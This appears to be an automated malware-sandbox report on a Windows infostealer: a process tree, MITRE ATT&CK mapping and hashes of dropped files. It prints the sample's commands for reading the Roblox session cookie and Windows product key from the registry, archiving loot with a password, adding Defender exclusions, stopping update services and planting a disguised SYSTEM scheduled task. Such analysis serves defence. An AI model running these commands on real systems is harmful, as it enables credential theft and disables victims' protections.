        
        PID:7684
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        8⤵
        
        PID:3916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        8⤵
        
        PID:7868
        
        C:\Windows\system32\getmac.exe
        
        getmac
        9⤵
        
        PID:7828
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI23682\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\bXgt7.zip" *"
        8⤵
        
        PID:7900
        
        C:\Users\Admin\AppData\Local\Temp\_MEI23682\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI23682\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\bXgt7.zip" *
        9⤵
        Executes dropped EXE
        
        PID:8048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        8⤵
        
        PID:2636
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        8⤵
        
        PID:5328
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        9⤵
        
        PID:5268
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        8⤵
        
        PID:5224
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        9⤵
        
        PID:5168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        8⤵
        
        PID:3424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        8⤵
        
        PID:5652
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        9⤵
        Detects videocard installed
        
        PID:5728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        8⤵
        
        PID:5764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4492
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:7080
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:7028
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:7136
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:7184
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:7148
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:7112
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:7180
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:7152
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
  2⤵
  - Creates scheduled task(s)
  PID:6984
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:7596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:6356
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6384
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:6700
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4168
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:348
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4612
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2280
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4564
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1956
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:3636
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
  2⤵
  - Creates scheduled task(s)
  PID:6972
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1760
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:3124
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:6800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3472

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3832

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3892

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4280

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4288

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4160

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2124

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2164

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1900

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:4860

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4312

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:7448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\based.exe

Filesize
7.5MB

MD5
d9eb7fd115d5322c87c2cd11a99df343

SHA1
301bb836ed92f5bca358e6da08d824135c01608f

SHA256
0d1ff13243b82490d62f820a83e8ff834270ef8f847c85d0f567fe401dfd90d8

SHA512
2f7ac5f85e46cd51f6a3796961f7291126028eee89f04c8e16198914ea92aa824d42b532578d8845ad4a538e4832e3520c88220ae76f3db8f78001576b3f9978

Download Submit
C:\ProgramData\Microsoft\hacn.exe

Filesize
24.0MB

MD5
70d8f32540470db5df9d39deed7bd6cb

SHA1
a14147440736d4f1427193cd206f519890b9f2f2

SHA256
858bdc7b94a957a182492a2d21e096b2fb2ab5317ae9e3e882243ad80953227e

SHA512
522fc6bc180c5e9e7bc60ece7404162692f0a7902923465082cf5449bc9d2f247b8e7d60f7f0bf5a24bf98fc07826b743a49b71eba406f6073990c3355944870

Download Submit
C:\ProgramData\main.exe

Filesize
5.6MB

MD5
3d3c49dd5d13a242b436e0a065cd6837

SHA1
e38a773ffa08452c449ca5a880d89cfad24b6f1b

SHA256
e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf

SHA512
dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00

Download Submit
C:\ProgramData\setup.exe

Filesize
5.4MB

MD5
1274cbcd6329098f79a3be6d76ab8b97

SHA1
53c870d62dcd6154052445dc03888cdc6cffd370

SHA256
bbe5544c408a6eb95dd9980c61a63c4ebc8ccbeecade4de4fae8332361e27278

SHA512
a0febbd4915791d3c32531fb3cf177ee288dd80ce1c8a1e71fa9ad59a4ebddeef69b6be7f3d19e687b96dc59c8a8fa80afff8378a71431c3133f361b28e0d967

Download Submit
C:\ProgramData\svchost.exe

Filesize
12.0MB

MD5
48b277a9ac4e729f9262dd9f7055c422

SHA1
d7e8a3fa664e863243c967520897e692e67c5725

SHA256
5c832eda59809a4f51dc779bb00bd964aad42f2597a1c9f935cfb37f0888ef17

SHA512
66dd4d1a82103cd90c113df21eb693a2bffde2cde41f9f40b5b85368d5a920b66c3bc5cadaf9f9d74dfd0f499086bedd477f593184a7f755b7b210ef5e428941

Download Submit
C:\ProgramData\шева.txt

Filesize
14B

MD5
1207bc197a1ebd72a77f1a771cad9e52

SHA1
8ed121ff66d407150d7390b9276fe690dd213b27

SHA256
260658b9cb063d6ce96f681b18704e02fae7bf8fc995fc249ab0be1400983476

SHA512
d037cfa3b6e6ced9652b2c781bb54cf48dbaa0aaff05039ae4fd0122749eda472807d4198981aa6ceffeba6d2b23d7ad08d7d96983dbd8539cf6b07e46e157f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\Build.exe

Filesize
31.6MB

MD5
08e1038e4d9273b8100d577e526dc44c

SHA1
99adb811149a471494cf072f57d9b5d8b9824673

SHA256
db9a6c0ecd67af93aa714c81d6e13e01d9cec44088cd1eef19d6311ba9fe318b

SHA512
c6c59e295f88651799173c110cd4ee655f9a4345ef53c7a739e5ec2b97bba04b4c7d82a90d7677869d477d7af1cd7b7671a3c70bea173b3c6c97d7386ef18c45

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\_bz2.pyd

Filesize
48KB

MD5
83b5d1943ac896a785da5343614b16bc

SHA1
9d94b7f374030fed7f6e876434907561a496f5d9

SHA256
bf79ddbfa1cc4df7987224ee604c71d9e8e7775b9109bf4ff666af189d89398a

SHA512
5e7dcc80ac85bd6dfc4075863731ea8da82edbb3f8ffafba7b235660a1bd0c60f7dfde2f7e835379388de277f9c1ceae7f209495f868cb2bd7db0de16495633c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\_decimal.pyd

Filesize
106KB

MD5
0cfe09615338c6450ac48dd386f545fd

SHA1
61f5bd7d90ec51e4033956e9ae1cfde9dc2544fe

SHA256
a0fa3ad93f98f523d189a8de951e42f70cc1446793098151fc50ba6b5565f2e3

SHA512
42b293e58638074ce950775f5ef10ec1a0bb5980d0df74ad89907a17f7016d68e56c6ded1338e9d04d19651f48448deee33a0657d3c03adba89406d6e5f10c18

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\_hashlib.pyd

Filesize
35KB

MD5
7edb6c172c0e44913e166abb50e6fba6

SHA1
3f8c7d0ff8981d49843372572f93a6923f61e8ed

SHA256
258ad0d7e8b2333b4b260530e14ebe6abd12cae0316c4549e276301e5865b531

SHA512
2a59cc13a151d8800a29b4f9657165027e5bf62be1d13c2e12529ef6b7674657435bfd3cc16500b2aa7ce95b405791dd007c01adf4cdd229746bd2218bfdc03f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\_lzma.pyd

Filesize
85KB

MD5
71f0b9f90aa4bb5e605df0ea58673578

SHA1
c7c01a11b47dc6a447c7475ef6ba7dec7c7ba24e

SHA256
d0e10445281cf3195c2a1aa4e0e937d69cae07c492b74c9c796498db33e9f535

SHA512
fc63b8b48d6786caecaf1aa3936e5f2d8fcf44a5a735f56c4200bc639d0cb9c367151a7626aa5384f6fc126a2bd0f068f43fd79277d7ec9adfc4dcb4b8398ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\_socket.pyd

Filesize
43KB

MD5
57dc6a74a8f2faaca1ba5d330d7c8b4b

SHA1
905d90741342ac566b02808ad0f69e552bb08930

SHA256
5b73b9ea327f7fb4cefddd65d6050cdec2832e2e634fcbf4e98e0f28d75ad7ca

SHA512
5e2b882fc51f48c469041028b01f6e2bfaf5a49005ade7e82acb375709e74ad49e13d04fd7acb6c0dbe05f06e9966a94753874132baf87858e1a71dcffc1dc07

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-console-l1-1-0.dll

Filesize
11KB

MD5
503107c27112ec911cfb4d9036e9ba2d

SHA1
565380e9a5f47634a9aed83ba8154895bde976d3

SHA256
f0662c9566ef712112a85a7fd11c96ad296a9571bd6953a756440186baaadb9d

SHA512
6e63cc5f8d459fed7324caabcafea156d6e73e85b2016f5e8691f0bf885bdad368e1ccf7c7c468144b6459ef72d8eb4a194aabdeba4fcd34d0a7e9338176f2ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-datetime-l1-1-0.dll

Filesize
10KB

MD5
9d57e52ae71ed1c5d43f34848e40e7cb

SHA1
b53659a4f2a49b0605d171496e92482dccf9c616

SHA256
3f4fcc14e6d126bb6ec6ccc1f91632039c884916f1d2e4c03cedb6b6dd8ef85e

SHA512
0470a5b6d509f8df7c918a8516875980104c4a98d13dbee8188cb388d7c6687f71793fe5a7ea76042dd48040c5678301f4c7e910e965aa4dbf1727581c46b33e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-debug-l1-1-0.dll

Filesize
10KB

MD5
f060bcb3c78c0cf55ec3785bc5883d23

SHA1
72fe582ef0469ccb42207f187fa4ea605badedd1

SHA256
203f3714e7d67970c7a31712d5ccd2fcd7b81806f33d35d214332aebab3b1860

SHA512
7fac846c391a750daf7e427441e6901c3805eefc6a0e4ee0d308f9e40dd1c1398a0b0abc0b320f66c2f336b683fba64a825c23c4ae0dfcd56ade3f7e227406d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
10KB

MD5
a73aab5ab512561781b64aef0fb35cb4

SHA1
386fc125dc8a75c5b22f624427a2692b05cf96db

SHA256
a8df626c1cf5a8b1674b80152c0f918b0614d3bde2187beb620845f35a6eb2e7

SHA512
2d409f259dd26f3fb6d6033789d6b312a8b09ea1aa8d12a73ac7cf7d070273c36f674b6711d0109ffe891778de8e3913b0bfa32464d1c323ff1cb4b1d9892032

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-file-l1-1-0.dll

Filesize
14KB

MD5
ce6a226c3c6311ce8eb8a0fcf88088b5

SHA1
ff3b1c5aba77fd77f1a6e1605dcffa26422e0076

SHA256
a86f39bc492e9de3fb570d0836b0d6d07b642ffa63f0410298161134af7c898b

SHA512
3e9d28f10108e2cff08a02082035f0f7caec60dd57ea004f6862d2958bcfbb378a5d6172ce152ca9727a7263125f97a5c8a1810e5de61902a3536bed56a78085

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-file-l1-2-0.dll

Filesize
10KB

MD5
e6b0bfdc2a7d1f78ef3d1396ffc4bdc4

SHA1
eeba46491e45d08c114f20c62e46149b2451e311

SHA256
0377bc9cb4b16f1a9542b0b6879de48e9f5b6731a231bbf47087b025596e25a5

SHA512
f903e2efb8b4e6195d4218adbd5dc491e2c83e5c943f0ef34e9575b7398e8e9cfdbada8933ab91dcc45a32e480e9b745e664951114b2511a79b3419bb5f4bdb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-file-l2-1-0.dll

Filesize
10KB

MD5
327b8dbe3e777c74a38cf00efaddecea

SHA1
67c3ce374c22a2e02b46fd90b18307519c41f419

SHA256
0a7e52e026b508bf15d467bba217fec9667a059885d30b1f76de94e29ed4c0bc

SHA512
e1495c0c026311f19680da93e73d373eec64253f808ec4346597e2f45a91cedcc693cb5fdd95569fa8cdfcc5a7bce79357a95c0a08fb0618d76d68089f43000e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-handle-l1-1-0.dll

Filesize
10KB

MD5
eb957e8261032210713e41ad5b337d2e

SHA1
8a7c017062e012c32e176083c8ffa7844d71d200

SHA256
2ebf7be5a6354058e59bfcc79b7ef6bce71e7023f14c511caafe64554c23c9f4

SHA512
94e2f61d05d3660fca944fbd095f0ff8749650439125e82173526438a61c1aa95c9bb7cdd9f28ab833b994823acaf0089d0257f2a6c69a6ff47f27736d901596

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-heap-l1-1-0.dll

Filesize
11KB

MD5
c6b13314244d6e3e0105d9629cb09557

SHA1
c381a27559662ae4ebbdbf3cb6de51cafdd31040

SHA256
0bf07d463810f879d8df1223f4d0b20973ecf8b26823cf098782a610e27df5df

SHA512
84f4bca6693ca3a5e23b436b3b0cc499d4cf2f15b6d711ce52dc393cd8cf3dc7309b2d870560119ef7df566e0e8941ddb550d2598e53fd41fcfc7bcee9031395

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
10KB

MD5
69cdcb563ee8d09e36e79fd28602b183

SHA1
dd9dd9fd076b16ece4a8af7316500db22d4e40ce

SHA256
9a2e5288bafaab45b15123b7ed6237c7b4563c6d74cdc759dcd9eee8a5ef4691

SHA512
d4655d8f1db40e781f910e1739258035f4d7e2b4af17a7127f06596362b0320dfd0dced7e2d2c8dcac542335dbe15a4c82aa2d410bbdcf371896d562964ad628

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
11KB

MD5
464b832650ac3772d438465d879f67f8

SHA1
cced7541a2815683a909826d7dc38cccff4f331f

SHA256
687f9ed37741b96db498e64a5ab870cfa64365b2a3a405cc3165d3f56818101a

SHA512
f9e5b5bde2327a0a06bf1cf455a5b271cbad4f81e960b626f4e7352d4435a4c3794761988a7ab7ec44c4d4ee68518e5cf5e8a9f7758547d298a6e07e8f458e53

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-localization-l1-2-0.dll

Filesize
13KB

MD5
30e30760b6dac6bcd78a609b4c9ad289

SHA1
1a35b6d6d9647701c2998c4f1462def9a745af3a

SHA256
62e13dfa9eda56d7b46328f05f8b3c8144f9a777fe80812fddc2a7b855372bc7

SHA512
216352f7cacdd650f679f9b10acbf8560e9ab85e0547e07996eadd96a04885fe0d8671a32666013dd3cb20f771734136916ab67c68a0f670ce591125eca4e4e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-memory-l1-1-0.dll

Filesize
11KB

MD5
0b9892da162b21233a01bbbb4b81652f

SHA1
2082d040c6604952fb9bbb4e363405b6d2e8d44c

SHA256
bb745558e622125cfea142d38c5ef1c3649a373bce1aa01d3e8f8dbfe0868d58

SHA512
97b5f27e77144fbba22ad0412e911922cd03756a0d7a424666c4b25e5623bdb0b1e927a49d24574046df9077918a8e96914f7b595dd3ffaed90bae497eace3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
10KB

MD5
d5f7756fc41d532facce6b3ee29a31ba

SHA1
e69112442ef9bfc19ae72d54a698412c4c84f6d9

SHA256
78baca9c25f810a2412d7b6666adbb3e243804c2d81afaf8445780713b4f53d9

SHA512
3ce437bfb4a57ba50f5f9701509e52841c79ca0eadd360c9505994d6232b2c226386573ac026848be8f77d1870131e963483ccd38fcac464511a4203ee5d4b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
11KB

MD5
d339b7d39cf45b8897b9969c421e905a

SHA1
2feb095a1313d2f0c6b1fe93d7122b70242a5947

SHA256
655f58ac5e386a55e8a16beb9df6a1f146c688b84637396f7a618b4ce7389728

SHA512
52454636d441905901c58a67e3129ee8e9806e109a8100e5866de3cf27392cc5f4611622baf697ac3900258b9cf6229827229174efe4ae8041db9f90b8b6ab97

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
12KB

MD5
811212517eb46d8fc1e2f07e7d6ff53e

SHA1
9bf10f90e45216098371b7b73270db036935ca91

SHA256
8db297037c3c60f7c3bd5f363b62c57a74a468a25771da62496b2f3c51a88f0a

SHA512
6f0bfcfdd97007e989d29d64661743d1717d3f12101629c7d49e8d65cd319fc5ded5679046cb37cc2f9ce4ae8af3be222d842e2d256a26616c90d60ab4e4c458

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
11KB

MD5
febccad96bebeab0a0fba7d8be5b8472

SHA1
bf6e2a548a312496539e1780aac5653c134659cd

SHA256
691443c7db5c0e499a6a85363a2f8f4c97e93de378e36d307742b6acd3bc4fe5

SHA512
802db20a82432fcd955d1ae4fa791fe74ba464832a4bb4c3a6400a19d075e847acff475446d7756bd7c752937742f6505df4fe7152056e335af21d3e289607c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-profile-l1-1-0.dll

Filesize
10KB

MD5
32c5ad65616c74ec872a712804d10a14

SHA1
0eb6dca10c0aa5a87665721405287157adf7d396

SHA256
fdeca8d1b88cae03a11fb5a86e7782632fb04e986dc7a6f86653daf54f78c811

SHA512
a16d7d9c0877ff0094e3fefa16347761077812eec8f872e70fb26e689a6beec802258b71d7e3b32d5db82dc7815d3d8f47c9651a48b28fef6cef8fffe8c6b10d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-rtlsupport-l1-1-0.dll

Filesize
11KB

MD5
5e64dc563fead265c956bea86d4672ef

SHA1
b65f9ddb024ebd4da0d3da906479656fc84f1437

SHA256
aa09ec5625a16af3036391e699ef424da4a12ba3b78295c184f612781e22520d

SHA512
063fa4e344a73343344ead1dd010af31da6f4626271a4d4fc5289d707d9b545b05ac5ace36604c52191b5c8956a9c9938e540c25289f9abba9a0bd5859b90108

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-string-l1-1-0.dll

Filesize
10KB

MD5
063deb74c0f0b59ff8e172fce1c3df53

SHA1
7db0692bccb9d30bc4dbf6599b6d458276751442

SHA256
c21ccfd076bfedb61db51f98ae6b70b7a907d85c72c4a9b0e5599f0dc96c5a65

SHA512
d7be3da3772d7e5cdf3707d2ca36e1f9eace2acbf55676fee245fc489069221fe35ba5c72d5e039c3411e68b3a5d938a09aa3ad4cdfe22211a2613ce3a072cb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-synch-l1-1-0.dll

Filesize
12KB

MD5
4f19373713d1641a4f507c836652d3bf

SHA1
558b99b352839f36060d032f1494f99ada3fa7ec

SHA256
07cb1bfa10271e007cb62fea7e801a120d2b09aeb300ddc151ea001abebf88ef

SHA512
5e1a9acae35c8ab1b8fc621287f009969f0e8c66856ccdd3889c520be99588eca0b360e4c1a864985ae19d1e1db4533deb45e33d19681d5bcfae0d76877cc614

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-synch-l1-2-0.dll

Filesize
11KB

MD5
38c585bf458859da397d267e14fd81d8

SHA1
110af52a99e3c98e600890e5c0b2c5dad7412d74

SHA256
a1b17f63f01aecaa21d085bd3462f827c41c271bf1608da18b52447e4bb38c01

SHA512
21458b6de7277d1d34727bf12e26a7c936b34a422286e4c42238e80f8a6c39a2889272276e089bc45ac3342b50d973c8287e239192bf199923473b450d8a2b84

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-sysinfo-l1-1-0.dll

Filesize
11KB

MD5
760b2155d579aec44965558418e34202

SHA1
1f4106ef71ea6976b28bf54342a800676460faed

SHA256
a0646f19637e83a788bd7d847e88ee767eefa492da18abe3909c8bdee000e105

SHA512
f43c0434b1240ab611d6a3361c53c212f529a232c5487c0b09835dce23e04ffd026a361ee42b5274e697a8d3de61caa4426ed25434fced9a13e62e6798198a54

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19562\api-ms-win-core-timezone-l1-1-0.dll

Filesize
11KB

MD5
aecf6fb286ebb136b20e2b08f129d6dd

SHA1
a77ead7b9af5720001536a673047050ca0776e25

SHA256
8c16e98f5f9137c8321a8df4d336750df529e151dd16b636b0ded00c8662d0ab

SHA512
402539733a80c00d5f8150a470b7099bca05822486517af9d0cfa7267118cc74611980963f716b354ca2c868892a537ef2dcb65c2c76991579c4611c1cdadbc0

Download Submit
